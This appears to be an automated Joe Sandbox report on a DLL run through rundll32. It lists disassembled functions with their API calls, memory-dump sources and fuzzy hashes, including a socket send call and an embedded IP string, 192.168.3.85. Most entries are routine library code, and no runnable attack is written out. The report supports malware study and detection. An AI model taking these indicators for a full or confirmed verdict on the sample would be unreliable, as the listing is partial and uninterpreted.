                                                                                                                      • Opcode Fuzzy Hash: 085ceebb537b79095729454c239c812d1055ab42ca5db445185b2e3eb14481ee
                                                                                                                      • Instruction Fuzzy Hash: 0B21D075D0025ADFDB21CB54CC417EEB7B0EF08350F10412AED41AB290EB30AE84DBA1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1002B3A9 Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetMapMode.GDI32(?), ref: 1002B3B9
                                                                                                                      • GetDeviceCaps.GDI32(?,00000058), ref: 1002B3F3
                                                                                                                      • GetDeviceCaps.GDI32(?,0000005A), ref: 1002B3FC
                                                                                                                        • Part of subcall function 1001ED4C: MulDiv.KERNEL32 ref: 1001ED8C
                                                                                                                        • Part of subcall function 1001ED4C: MulDiv.KERNEL32 ref: 1001EDA9
                                                                                                                      • MulDiv.KERNEL32 ref: 1002B420
                                                                                                                      • MulDiv.KERNEL32 ref: 1002B42B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CapsDevice$Mode
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 696222070-0
                                                                                                                      • Opcode ID: ad45f33bd95501225e01621eadf3d29f248a2335d01e386e7c92b4ca8057da2f
                                                                                                                      • Instruction ID: 63e99b0baf6d5dcfdd2b5bb48b7ec33f4fcd9c2a57d1919fdecc035dbf7e745c
                                                                                                                      • Opcode Fuzzy Hash: ad45f33bd95501225e01621eadf3d29f248a2335d01e386e7c92b4ca8057da2f
                                                                                                                      • Instruction Fuzzy Hash: 2D110E71600A14EFDB21AF55CC84C0EBBE9EF89350B514829FA8597361DB31ED01CF90
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1002B437 Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetMapMode.GDI32(?), ref: 1002B447
                                                                                                                      • GetDeviceCaps.GDI32(?,00000058), ref: 1002B481
                                                                                                                      • GetDeviceCaps.GDI32(?,0000005A), ref: 1002B48A
                                                                                                                        • Part of subcall function 1001ECE3: MulDiv.KERNEL32 ref: 1001ED23
                                                                                                                        • Part of subcall function 1001ECE3: MulDiv.KERNEL32 ref: 1001ED40
                                                                                                                      • MulDiv.KERNEL32 ref: 1002B4AE
                                                                                                                      • MulDiv.KERNEL32 ref: 1002B4B9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CapsDevice$Mode
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 696222070-0
                                                                                                                      • Opcode ID: 6f199a3495fbdd21d567dc82426adb66683fca9deaa291746216ef97ded9c58c
                                                                                                                      • Instruction ID: 3f65263faca37ec2066e18a28c5c11a55be6ae6448755079bbf75ecdaa8dd8b2
                                                                                                                      • Opcode Fuzzy Hash: 6f199a3495fbdd21d567dc82426adb66683fca9deaa291746216ef97ded9c58c
                                                                                                                      • Instruction Fuzzy Hash: 2511CE75600A14EFDB21AF55CC84C1EBBEAEF89750B118819FA8597361DB31EC01DB90
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 100203DD Relevance: 7.6, APIs: 5, Instructions: 53stringCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • lstrlenA.KERNEL32(?), ref: 10020407
                                                                                                                      • _memset.LIBCMT ref: 10020424
                                                                                                                      • GetWindowTextA.USER32(?,00000000,00000100), ref: 1002043E
                                                                                                                      • lstrcmpA.KERNEL32(00000000,?), ref: 10020450
                                                                                                                      • SetWindowTextA.USER32(?,?), ref: 1002045C
                                                                                                                        • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: TextWindow$Exception@8Throw_memsetlstrcmplstrlen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 289641511-0
                                                                                                                      • Opcode ID: f79365a65109cbbcc9a6bbc28f9d7fd9ec1dc43e3c7e56829fb32e92ee025925
                                                                                                                      • Instruction ID: 4dbc6bba0439fa9bebd62d9ace19f6e6ac74746b4d7c1d87a51b75f8b83cd490
                                                                                                                      • Opcode Fuzzy Hash: f79365a65109cbbcc9a6bbc28f9d7fd9ec1dc43e3c7e56829fb32e92ee025925
                                                                                                                      • Instruction Fuzzy Hash: DA01DBB5600314ABE711DF64DEC4BDF77ADEF19341F404065F646D3142EAB09E448761
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 100329FD Relevance: 7.5, APIs: 5, Instructions: 43threadCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 100310AD: _doexit.LIBCMT ref: 100310B5
                                                                                                                      • ___set_flsgetvalue.LIBCMT ref: 10032A0A
                                                                                                                        • Part of subcall function 10035135: TlsGetValue.KERNEL32 ref: 1003513B
                                                                                                                        • Part of subcall function 10035135: __decode_pointer.LIBCMT ref: 1003514B
                                                                                                                        • Part of subcall function 10035135: TlsSetValue.KERNEL32(00000000,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387,0000000D,10050C60), ref: 10035158
                                                                                                                        • Part of subcall function 1003511A: TlsGetValue.KERNEL32 ref: 10035124
                                                                                                                      • __freefls@4.LIBCMT ref: 10032A60
                                                                                                                        • Part of subcall function 1003515F: __decode_pointer.LIBCMT ref: 1003516D
                                                                                                                      • GetLastError.KERNEL32(00000000,?,00000000,?,?), ref: 10032A32
                                                                                                                      • ExitThread.KERNEL32 ref: 10032A39
                                                                                                                      • GetCurrentThreadId.KERNEL32(00000000,?,00000000,?,?), ref: 10032A3F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Value$Thread__decode_pointer$CurrentErrorExitLast___set_flsgetvalue__freefls@4_doexit
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2731880238-0
                                                                                                                      • Opcode ID: ae3910c06ee5840ca0e9954760db7c1db5c6932cf2e7a7bf95a1dcd3ebd7d57f
                                                                                                                      • Instruction ID: 3ca39206478dd66d9189836c3fdd0f1ffde406c57308cf63c3fc949a3eb6cb77
                                                                                                                      • Opcode Fuzzy Hash: ae3910c06ee5840ca0e9954760db7c1db5c6932cf2e7a7bf95a1dcd3ebd7d57f
                                                                                                                      • Instruction Fuzzy Hash: 9F015E784046519FDB06EBA1DE4594E7BA9EF48243F208458E905CF232DB35E841CB52
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10012890 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 123COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 100134C0: GetSystemMenu.USER32 ref: 100134D2
                                                                                                                      • GetWindowLongA.USER32(?,000000F0), ref: 1001295E
                                                                                                                      • SetWindowLongA.USER32 ref: 10012989
                                                                                                                        • Part of subcall function 10013460: AppendMenuA.USER32(?,00000000,00000065,00000000), ref: 1001347A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: LongMenuWindow$AppendSystem
                                                                                                                      • String ID: 192.168.3.85$Message
                                                                                                                      • API String ID: 4121476972-856608562
                                                                                                                      • Opcode ID: a90c92772972697092915343de334961b3277e080dc7b5a44fb96fcdbf979901
                                                                                                                      • Instruction ID: 5cf2a2d3600ddfe9e3e75c53ffe40091173084dcd34b91a452ef246a626808d6
                                                                                                                      • Opcode Fuzzy Hash: a90c92772972697092915343de334961b3277e080dc7b5a44fb96fcdbf979901
                                                                                                                      • Instruction Fuzzy Hash: 12411B74A4020A9BDB04DB94CC52FBFB771EF44714F108228F5226F2D2DB75A945CB54
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10013010 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 108memorynetworkCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 1001E3AC: __EH_prolog3.LIBCMT ref: 1001E3B3
                                                                                                                        • Part of subcall function 1001E3AC: GetWindowTextA.USER32(?,?,?), ref: 1001E3C9
                                                                                                                        • Part of subcall function 1001DDF4: IsWindow.USER32(?), ref: 1001DE03
                                                                                                                      • _DebugHeapAllocator.LIBCPMTD ref: 100130B2
                                                                                                                        • Part of subcall function 10013820: _DebugHeapAllocator.LIBCPMTD ref: 10013875
                                                                                                                      • _strcat.LIBCMT ref: 1001310A
                                                                                                                        • Part of subcall function 100137A0: SendMessageA.USER32 ref: 100137BB
                                                                                                                      • send.WS2_32(?,?,00000064,00000000), ref: 10013195
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocatorDebugHeapWindow$H_prolog3MessageSendText_strcatsend
                                                                                                                      • String ID: :
                                                                                                                      • API String ID: 16450322-3653984579
                                                                                                                      • Opcode ID: 9ddd6bf09d0258533da1bacb9ba6165969689cc60440b7d914755c42b9ef06e0
                                                                                                                      • Instruction ID: 3ba3dcfd2515130731a8a819d4d55e20edbbe216b941dc915dfb352fa90348a6
                                                                                                                      • Opcode Fuzzy Hash: 9ddd6bf09d0258533da1bacb9ba6165969689cc60440b7d914755c42b9ef06e0
                                                                                                                      • Instruction Fuzzy Hash: F1412CB59001189FDB28DB64CC91BEEB775FF48304F1082ADE51AAB282DF346A84CF54
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1001C1A0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39libraryloaderCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 10020E5D: EnterCriticalSection.KERNEL32(10057798,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020E99
                                                                                                                        • Part of subcall function 10020E5D: InitializeCriticalSection.KERNEL32(?,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EA8
                                                                                                                        • Part of subcall function 10020E5D: LeaveCriticalSection.KERNEL32(10057798,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EB5
                                                                                                                        • Part of subcall function 10020E5D: EnterCriticalSection.KERNEL32(?,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EC1
                                                                                                                        • Part of subcall function 1002072F: __EH_prolog3_catch.LIBCMT ref: 10020736
                                                                                                                        • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                      • GetProcAddress.KERNEL32(00000000,HtmlHelpA,Function_0001B602,0000000C), ref: 1001C1E4
                                                                                                                      • FreeLibrary.KERNEL32(?), ref: 1001C1F4
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3_catchInitializeLeaveLibraryProcThrow
                                                                                                                      • String ID: HtmlHelpA$hhctrl.ocx
                                                                                                                      • API String ID: 3274081130-63838506
                                                                                                                      • Opcode ID: c4ff01ed609920668b45cb7a661f9e4cbf771a6b1ff00103ddf750d8f10613a5
                                                                                                                      • Instruction ID: 160066d18b9ed5655b72b10460cb3280c451ea5be833735a295996cf30cd07f4
                                                                                                                      • Opcode Fuzzy Hash: c4ff01ed609920668b45cb7a661f9e4cbf771a6b1ff00103ddf750d8f10613a5
                                                                                                                      • Instruction Fuzzy Hash: AB01F431044706EFE721DFA0AE06F4B7AD5FF04B42F114819F48B98452D770E890AA26
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1003CB01 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37libraryloaderCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetModuleHandleA.KERNEL32(KERNEL32,10033B0B), ref: 1003CB06
                                                                                                                      • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 1003CB16
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                                      • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                      • API String ID: 1646373207-3105848591
                                                                                                                      • Opcode ID: dc24b012ca1fb4bb896a1dc56100cb90a959cbbb7befe9f8aa549c159bb80eea
                                                                                                                      • Instruction ID: 56947a08a2dfe052dc663468ef672e03bc5ef0643ca607e86d2238c745675855
                                                                                                                      • Opcode Fuzzy Hash: dc24b012ca1fb4bb896a1dc56100cb90a959cbbb7befe9f8aa549c159bb80eea
                                                                                                                      • Instruction Fuzzy Hash: EDF0362090091DE6EF01AFA1AD4969F7A74FB45747F510594E592F0094EF7081B49356
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 100026D0 Relevance: 6.4, APIs: 5, Instructions: 118COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SetLastError.KERNEL32(0000007F), ref: 100026FF
                                                                                                                      • SetLastError.KERNEL32(0000007F), ref: 1000272B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLast
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1452528299-0
                                                                                                                      • Opcode ID: c9d272d6c554433b4f74cd5ef5cb02bf0863a661864ac41ad17d6d3c26d06b94
                                                                                                                      • Instruction ID: 8e64829365f1e03862022e03b3a1730166a9b8a5af119672a2ae158ec68dc0e1
                                                                                                                      • Opcode Fuzzy Hash: c9d272d6c554433b4f74cd5ef5cb02bf0863a661864ac41ad17d6d3c26d06b94
                                                                                                                      • Instruction Fuzzy Hash: 15511774E0411AEFEB04CF94C980AAEB7F1FF48344F208568E819AB345D774EA41DB91
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10028638 Relevance: 6.3, APIs: 4, Instructions: 309memoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Task$AllocFreeH_prolog3_malloc_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2459298410-0
                                                                                                                      • Opcode ID: b6c8e678dd8cba4893e36996dac287b8b30c9fe5aa06e3a6383aee97f0bdd673
                                                                                                                      • Instruction ID: 44ba6f7c8c4d87fab9365827d96dd2610bd0c5aaa7a7505ecb33efb7383b78fb
                                                                                                                      • Opcode Fuzzy Hash: b6c8e678dd8cba4893e36996dac287b8b30c9fe5aa06e3a6383aee97f0bdd673
                                                                                                                      • Instruction Fuzzy Hash: 2BC14878601709EFCB14CF68D884AAEB7F5FF88304B648919F856CB291DB71EA41CB50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 100294E4 Relevance: 6.2, APIs: 4, Instructions: 186COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FreeTask$ClearH_prolog3Variant
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 365290523-0
                                                                                                                      • Opcode ID: f4bb32272e54c4630c0f1c2b8213bbcb586b41b40c6f53f6c8fe32820d3a87b6
                                                                                                                      • Instruction ID: 6dfbb0beff937a9ff07d9f1090c18b3058f0abcc9665a1e5acd726f5cd97e7a7
                                                                                                                      • Opcode Fuzzy Hash: f4bb32272e54c4630c0f1c2b8213bbcb586b41b40c6f53f6c8fe32820d3a87b6
                                                                                                                      • Instruction Fuzzy Hash: 6D711775A00A52CFCB60CFA4D9D892AB7F5FF483447A1086DE1469B661CB31EC84CB50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1002910E Relevance: 6.2, APIs: 4, Instructions: 173windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Rect$DesktopVisible
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1055025324-0
                                                                                                                      • Opcode ID: 935237afc4adc895a68147513c1bf8892873bb4cd96f085db3d98f84c1cebb7e
                                                                                                                      • Instruction ID: 30a46d7291c636a93fdcae379f64361bdaca7d323e8f19b7ddc13159497105e4
                                                                                                                      • Opcode Fuzzy Hash: 935237afc4adc895a68147513c1bf8892873bb4cd96f085db3d98f84c1cebb7e
                                                                                                                      • Instruction Fuzzy Hash: 0751E875A0051AEFCB04EFA8DD84CAEB7B9FF48244B614458F515EB255C731EE44CB60
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1002C6D0 Relevance: 6.1, APIs: 4, Instructions: 132timeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 1002C6E7
                                                                                                                        • Part of subcall function 1001DCEA: _wctomb_s.LIBCMT ref: 1001DCFA
                                                                                                                      • GetFileTime.KERNEL32(?,?,?,?), ref: 1002C71E
                                                                                                                      • GetFileSize.KERNEL32(?,00000000), ref: 1002C733
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: File$SizeTime_memset_wctomb_s
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 26245289-0
                                                                                                                      • Opcode ID: 7b2a999f3c33549589a606ce6b98c8e8e242c4bbabb886e5bb6986c1362b8808
                                                                                                                      • Instruction ID: d07d59a7ff7176791715ff84f3171322556d45097dda904751fff30d64e08997
                                                                                                                      • Opcode Fuzzy Hash: 7b2a999f3c33549589a606ce6b98c8e8e242c4bbabb886e5bb6986c1362b8808
